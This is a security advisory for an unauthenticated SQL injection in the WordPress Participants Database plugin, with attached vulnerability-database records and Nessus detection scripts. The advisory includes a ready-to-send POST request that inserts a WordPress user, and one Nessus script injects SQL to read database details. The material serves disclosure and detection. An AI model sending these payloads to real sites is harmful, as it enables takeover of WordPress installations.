Yarubo #1: Arbitrary SQL Execution in Participants Database for Wordpress
=========================================================================
Program: Participants Database <= 1.5.4.8
Severity: Unauthenticated attacker can fully compromise the Wordpress
installation
Permalink: http://www.yarubo.com/advisories/1
— Info —
Participants Database is a popular Wordpress plugin that offers the
functionality needed to build and maintain a database of people. As of
today, the plugin has been downloaded 92,089 times.
— Vulnerability details —
1. Due to insufficient privilege checks, it is possible for anonymous
(unauthenticated) users to trigger some administrative actions if any of
the shortcodes is used (e.g. on the signup page).
2. The action "export CSV" takes a parameter called "query" that can
contain an arbitrary SQL query. This means that an unauthenticated user can
execute arbitrary SQL statements (e.g. create an admin user, read or write
files, or execute code, depending on the privileges of the MySQL user).
— Exploit —
Add a user to wordpress as follows (if you want an admin user, also add
admin privileges to wp_usermeta):
POST /wordpress/pdb-signup/ HTTP/1.1
Host: www.example.com
Content-Length: 789
(…)
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundaryuoACADe1C2IFWMxN
------WebKitFormBoundaryuoACADe1C2IFWMxN
Content-Disposition: form-data; name="action"
output CSV
------WebKitFormBoundaryuoACADe1C2IFWMxN
Content-Disposition: form-data; name="CSV_type"
participant list
------WebKitFormBoundaryuoACADe1C2IFWMxN
Content-Disposition: form-data; name="subsource"
participants-database
------WebKitFormBoundaryuoACADe1C2IFWMxN
Content-Disposition: form-data; name="query"
INSERT INTO wp_users
(ID,user_login,user_pass,user_nicename,user_email,user_registered,user_status,display_name)
VALUES
(31337,0x74657374,0x245024425a7a59615354486f41364b693355363576772f5461473861412f475a4b31,0x59617275626f,0x7465737440746573742e636f6d,0x323031342d31312d31312030303a30303a3030,0,0x59617275626f);
------WebKitFormBoundaryuoACADe1C2IFWMxN
— Solution —
This issue has been fixed in version 1.5.4.9; installations running
1.5.4.8 or earlier should upgrade. Download the newest version from:
https://wordpress.org/plugins/participants-database/
— Credit —
Yarubo Research Team
research [at] yarubo.com
Network Security Scan:
http://www.yarubo.com/
Free Heartbleed Scan:
http://www.yarubo.com/heartbleed
{"id": "EDB-ID:33613", "hash": "2716e81c64a7d68def9bd4f0ddd82e52", "type": "exploitdb", "bulletinFamily": "exploit", "title": "WordPress Participants Database 1.5.4.8 - SQL Injection", "description": "Wordpress Participants Database 1.5.4.8 - SQL Injection. CVE-2014-3961. Webapps exploit for php platform", "published": "2014-06-02T00:00:00", "modified": "2014-06-02T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 7.5}, "href": "https://www.exploit-db.com/exploits/33613/", "reporter": "Yarubo Research Team", "references": [], "cvelist": ["CVE-2014-3961"], "lastseen": "2016-02-03T19:32:54", "history": [], "viewCount": 11, "enchantments": {"score": {"value": 6.3, "vector": "NONE", "modified": "2016-02-03T19:32:54"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-3961"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:7247"]}, {"type": "nessus", "idList": ["WORDPRESS_PARTICIPANTS_DATABASE_SQL_INJECTION.NASL", "WORDPRESS_PARTICIPANTS_DATABASE_1_5_4_9_SQLI.NASL"]}], "modified": "2016-02-03T19:32:54"}, "vulnersScore": 6.3}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/33613/", "sourceData": "Yarubo #1: Arbitrary SQL Execution in Participants Database for Wordpress\r\n=========================================================================\r\n\r\nProgram: Participants Database <= 1.5.4.8\r\nSeverity: Unauthenticated attacker can fully compromise the Wordpress\r\ninstallation\r\nPermalink: http://www.yarubo.com/advisories/1\r\n\r\n\u2014 Info \u2014\r\n\r\nParticipants Database is a popular Wordpress plugin that offers the\r\nfunctionality needed to build and maintain a database of people. As of\r\ntoday the plugin has been downloaded 92,089 times.\r\n\r\n\u2014 Vulnerability details \u2014\r\n\r\n1. Due to insufficient privilege checks it is possible for anonymous\r\n(unauthenticated) users to trigger some administrative actions If any of\r\nthe shortcodes is used (e.g. 
signup page).\r\n\r\n2. The action \"export CSV\" takes a parameter called \"query\" that can\r\ncontain an arbitrary SQL query. This means that an unauthenticated user can\r\nexecute arbitrary SQL statements (e.g. create an admin user, read or write\r\nfiles, or execute code depending on the MySQL user privileges).\r\n\r\n\r\n\u2014 Exploit \u2014\r\n\r\nAdd a user to wordpress as follows (if you want an admin user, also add\r\nadmin privileges to wp_usermeta):\r\n\r\n\r\nPOST /wordpress/pdb-signup/ HTTP/1.1\r\nHost: www.example.com\r\nContent-Length: 789\r\n(\u2026)\r\nContent-Type: multipart/form-data;\r\nboundary=----WebKitFormBoundaryuoACADe1C2IFWMxN\r\n\r\n------WebKitFormBoundaryuoACADe1C2IFWMxN\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\noutput CSV\r\n------WebKitFormBoundaryuoACADe1C2IFWMxN\r\nContent-Disposition: form-data; name=\"CSV_type\"\r\n\r\nparticipant list\r\n------WebKitFormBoundaryuoACADe1C2IFWMxN\r\nContent-Disposition: form-data; name=\"subsource\"\r\n\r\nparticipants-database\r\n------WebKitFormBoundaryuoACADe1C2IFWMxN\r\nContent-Disposition: form-data; name=\"query\"\r\n\r\nINSERT INTO wp_users\r\n(ID,user_login,user_pass,user_nicename,user_email,user_registered,user_status,display_name)\r\nVALUES\r\n(31337,0x74657374,0x245024425a7a59615354486f41364b693355363576772f5461473861412f475a4b31,0x59617275626f,0x7465737440746573742e636f6d,0x323031342d31312d31312030303a30303a3030,0,0x59617275626f);\r\n\r\n------WebKitFormBoundaryuoACADe1C2IFWMxN\r\n\r\n\r\n\r\n\u2014 Solution \u2014\r\n\r\nThis issue has been fixed in version 1.5.4.9. 
Download the newest version\r\nfrom:\r\n\r\nhttps://wordpress.org/plugins/participants-database/\r\n\r\n\r\n\u2014 Credit \u2014\r\n\r\n\r\nYarubo Research Team\r\nresearch [at] yarubo.com\r\n\r\nNetwork Security Scan:\r\nhttp://www.yarubo.com/\r\n\r\nFree Heartbleed Scan:\r\nhttp://www.yarubo.com/heartbleed", "osvdbidlist": ["107626"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:13:46", "bulletinFamily": "NVD", "description": "SQL injection vulnerability in the Export CSV page in the Participants Database plugin before 1.5.4.9 for WordPress allows remote attackers to execute arbitrary SQL commands via the query parameter in an \"output CSV\" action to pdb-signup/.", "modified": "2014-06-05T14:48:00", "id": "CVE-2014-3961", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3961", "published": "2014-06-04T14:55:00", "title": "CVE-2014-3961", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "wpvulndb": [{"lastseen": "2019-12-11T13:39:33", "bulletinFamily": "software", "description": "WordPress Vulnerability - Participants Database 1.5.4.8 - pdb-signup CSV_type Action query Parameter SQL Injection\n", "modified": "2019-10-21T00:00:00", "published": "2014-08-01T00:00:00", "id": "WPVDB-ID:7247", "href": "https://wpvulndb.com/vulnerabilities/7247", "type": "wpvulndb", "title": "Participants Database 1.5.4.8 - pdb-signup CSV_type Action query Parameter SQL Injection", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2019-12-13T09:58:10", "bulletinFamily": "scanner", "description": "The Participants Database Plugin for WordPress installed on the remote\nhost is affected by a SQL injection vulnerability due to a failure to\nproperly sanitize user-supplied input to the ", "modified": "2019-12-02T00:00:00", "id": "WORDPRESS_PARTICIPANTS_DATABASE_SQL_INJECTION.NASL", "href": "https://www.tenable.com/plugins/nessus/76072", "published": "2014-06-16T00:00:00", "title": "Participants Database Plugin for WordPress 'query' Parameter SQL Injection", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76072);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\"CVE-2014-3961\");\n script_bugtraq_id(67769);\n 
script_xref(name:\"EDB-ID\", value:\"33613\");\n\n script_name(english:\"Participants Database Plugin for WordPress 'query' Parameter SQL Injection\");\n script_summary(english:\"Attempts to execute a SQL query.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts a PHP script that is affected by a SQL\ninjection vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Participants Database Plugin for WordPress installed on the remote\nhost is affected by a SQL injection vulnerability due to a failure to\nproperly sanitize user-supplied input to the 'query' parameter in the\npdb-signup script. An unauthenticated, remote attacker can exploit\nthis issue to inject or manipulate SQL queries in the back-end\ndatabase, resulting in the manipulation or disclosure of arbitrary\ndata.\n\nNote that the application is also reportedly affected by an\nunspecified flaw in which insufficient privilege checks allow an\nunauthenticated user to execute actions reserved for administrative\nusers when shortcodes are used; however, Nessus has not tested this\nissue.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2014/Jun/0\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wordpress.org/plugins/participants-database/#changelog\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Participants Database Plugin version 1.5.4.9 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", 
value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wordpress:wordpress\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:xnau:participants_databas3\");\n script_end_attributes();\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"wordpress_detect.nasl\", \"wordpress_participants_database_1_5_4_9_sqli.nasl\");\n script_require_keys(\"installed_sw/WordPress\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"url_func.inc\");\ninclude(\"data_protection.inc\");\n\napp = \"WordPress\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port\n);\n\ndir = install['path'];\ninstall_url = build_url(port:port, qs:dir);\n\nplugin = \"Participants Database\";\n\n# Check KB first\nget_kb_item_or_exit(\"www/\"+port+\"/webapp_ext/\"+plugin+\" under \"+dir);\n\nurl_path = install['Redirect'];\nif (!isnull(url_path)) url = url_path;\nelse url = dir + \"/\";\n\ntoken = SCRIPT_NAME - \".nasl\" + \"-\" + unixtime();\nid = rand() % 10000 + rand();\n\nquery = \"INSERT INTO wp_posts (ID, post_title, post_content) SELECT '\" +\n id + \"', '\" + token + \"', CONCAT('MySQL Version : ', @@version, '\" +\n \"\\nWordPress User : ', user_login, '\\nCurrent Database : 
', database())\" +\n \"from wp_users LIMIT 1;\";\n\nquery = urlencode(\n str : query,\n unreserved : \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234\" +\n \"56789=()_-;@:,\"\n);\n\nboundary1 = '---------------------------XXXXXXXXXXXXX';\nboundary = '-----------------------------XXXXXXXXXXXXX';\n\npostdata =\n boundary + '\\n' +\n 'Content-Disposition: form-data; name=\"action\"\\n\\n' +\n 'output CSV\\n' +\n boundary + '\\n' +\n 'Content-Disposition: form-data; name=\"CSV_type\"\\n\\n' +\n 'participant list\\n' +\n boundary + '\\n' +\n 'Content-Disposition: form-data; name=\"subsource\"\\n\\n' +\n 'participants-database\\n' +\n boundary + '\\n' +\n 'Content-Disposition: form-data; name=\"query\"\\n\\n' +\n query + '\\n' +\n boundary + '--\\n';\n\n# Attempt exploit\nres = http_send_recv3(\n method : \"POST\",\n item : url,\n data : postdata,\n add_headers : make_array(\"Content-Type\", \"multipart/form-data; boundary=\" +\n boundary1),\n port : port,\n exit_on_fail : TRUE\n);\n\nattack_req = http_last_sent_request();\n\n# Verify our attack worked\nurl2 = \"?page_id=\" + id;\nres2 = http_send_recv3(\n method : \"GET\",\n item : url + url2,\n port : port,\n follow_redirect : TRUE, # In case permalinks are used\n exit_on_fail : TRUE\n);\n\nif (\n \"MySQL Version\" >< res2[2] &&\n \"WordPress User : \" >< res2[2] &&\n token >< res2[2]\n)\n{\n output = strstr(res2[2], \"MySQL Version\");\n if (empty_or_null(output)) output = res[2];\n\n extra = 'Note that Nessus has not removed the blog post created by the POST'+\n '\\n' + 'request above; it will need to be manually removed.\\n';\n\n security_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n sqli : TRUE, # Sets SQLInjection KB key,\n line_limit : 5,\n request : make_list(attack_req, build_url(qs:url+url2, port:port)),\n output : data_protection::sanitize_user_full_redaction(output:output)\n );\n exit(0);\n}\nelse\n audit(AUDIT_WEB_APP_EXT_NOT_AFFECTED, app, install_url, plugin + \" 
plugin\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T09:58:10", "bulletinFamily": "scanner", "description": "The Participants Database Plugin for WordPress installed on the remote\nhost is prior to version 1.5.4.9. It is, therefore, affected by a SQL\ninjection vulnerability due to failure to properly sanitize\nuser-supplied input to the ", "modified": "2019-12-02T00:00:00", "id": "WORDPRESS_PARTICIPANTS_DATABASE_1_5_4_9_SQLI.NASL", "href": "https://www.tenable.com/plugins/nessus/76071", "published": "2014-06-16T00:00:00", "title": "Participants Database Plugin for WordPress < 1.5.4.9 'query' Parameter SQL Injection", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76071);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\"CVE-2014-3961\");\n script_bugtraq_id(67769);\n script_xref(name:\"EDB-ID\", value:\"33613\");\n\n script_name(english:\"Participants Database Plugin for WordPress < 1.5.4.9 'query' Parameter SQL Injection\");\n script_summary(english:\"Checks the plugin version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts a PHP script that is affected by a SQL\ninjection vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Participants Database Plugin for WordPress installed on the remote\nhost is prior to version 1.5.4.9. It is, therefore, affected by a SQL\ninjection vulnerability due to failure to properly sanitize\nuser-supplied input to the 'query' parameter in the 'pdb-signup'\nscript. 
A remote, unauthenticated attacker could leverage this issue\nto execute arbitrary SQL statements against the backend database,\nleading to manipulation of data or the disclosure of arbitrary data.\n\nThe application is reportedly also affected by an unspecified flaw in\nwhich insufficient privilege checks allows an unauthenticated user to\nexecute actions reserved for administrative users when shortcodes are\nused.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2014/Jun/0\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wordpress.org/plugins/participants-database/#changelog\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 1.5.4.9 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wordpress:wordpress\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:xnau:participants_databas3\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"wordpress_detect.nasl\");\n script_require_keys(\"installed_sw/WordPress\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\napp = \"WordPress\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port\n);\n\ndir = install['path'];\ninstall_url = build_url(port:port, qs:dir);\n\nplugin = \"Participants Database\";\n\n# Check KB first\ninstalled = get_kb_item(\"www/\"+port+\"/webapp_ext/\"+plugin+\" under \"+dir);\n\nif (!installed)\n{\n checks = make_array();\n regexes = make_list();\n regexes[0] = make_list(\"function serializeList\", \"#confirmation-dialog'\");\n checks[\"/wp-content/plugins/participants-database/js/manage_fields.js\"] = regexes;\n\n # Ensure plugin is installed\n installed = check_webapp_ext(\n checks : checks,\n dir : dir,\n port : port,\n ext : plugin\n );\n}\nif (!installed)\n audit(AUDIT_WEB_APP_EXT_NOT_INST, app, install_url, plugin + \" plugin\");\n\nversion = UNKNOWN_VER;\n\n# Get version from readme.txt\nres = http_send_recv3(\n method : \"GET\",\n port : port,\n item : dir + \"/wp-content/plugins/participants-database/readme.txt\",\n exit_on_fail : TRUE\n);\n\nif (\"=== Participants Database ===\" >< res[2] && \"Stable tag:\" >< res[2])\n{\n match = NULL;\n # Check Changelog section as Stable tag does not appear to be updated often\n output = strstr(res[2], \"== Changelog ==\");\n if (!isnull(output))\n {\n match = eregmatch(pattern:\"= ([0-9\\.]+) =\", string:output);\n if (!isnull(match)) version = match[1];\n }\n # Fall back to Stable Tag as a backup\n else\n {\n pattern = \"Stable tag: ([0-9\\.]+)\";\n match = eregmatch(pattern:pattern, string:res[2]);\n }\n if (isnull(match)) exit(1, \"Failed to 
read the 'readme.txt' file for the WordPress \" + plugin + \" located at \" + install_url + \".\");\n version = match[1];\n\n\n fix = \"1.5.4.9\";\n if (ver_compare(ver:version, fix:fix, strict:FALSE) == -1)\n {\n set_kb_item(name:'www/'+port+'/SQLInjection', value:TRUE);\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' +install_url+\n '\\n Installed version : ' +version+\n '\\n Fixed version : ' +fix + '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n }\n}\naudit(AUDIT_WEB_APP_EXT_NOT_AFFECTED, app, install_url, plugin + \" plugin\", version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}